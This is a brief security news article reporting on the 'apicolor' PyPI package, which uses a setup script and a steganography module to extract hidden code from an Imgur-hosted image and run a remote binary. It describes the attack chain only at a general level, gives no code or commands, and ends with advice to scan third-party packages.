Security researchers have recently found a new malicious package inside the Python Package Index or PyPI, which hides code in images using a steganographic technique that can infect users of GitHub’s open-source projects.
Based on a released advisory, the malicious package dubbed ‘apicolor’ seemed to be one of the many in-development packages on PyPI. However, after an in-depth analysis, the package had shown to possess a strange and non-trivial code section at the beginning that concerned the researchers.
The malicious code performs a manual installation of additional requirements, downloading an image online and using the installed package to process the downloaded image to begin the processing generated output via the exec command.
The apicolor malicious package obfuscates its activities via the setup script used for specifying a package’s associated metadata. Subsequently, the package will bring a second code called ‘judyb’ and a benign PNG file hosted on an image-sharing website ‘Imgur.’
Researchers explained that the judyb code is a steganography module that hides and reveals hidden messages inside photos. This code is also used to extract obfuscated Python code embedded in the downloaded photo, which also retrieves and executes a malicious binary from the threat operators’ remote server.
Users searching online for legitimate open-source projects are warned about those that could be hiding a malicious PyPI package that can infect them.
Researchers noted that this newly discovered malicious PyPI package is distinct from all the other packages they have previously analysed because of how it hides the code to target PyPI users and infect them with malicious GitHub imports.
Furthermore, this discovery indicates that threat actors hiding malicious PyPI packages via advanced obfuscation techniques, such as steganography, have been a rapidly evolving issue. The threat operators apply meticulous approaches to their operations, including hiding the code and downplaying the malicious packages on PyPI, which is considered sophisticated work.
GitHub’s open-source project users and companies are advised to apply threat code scanners in their infrastructure to deeply assess third-party packages and confirm that the GitHub project ratings are not generated falsely.
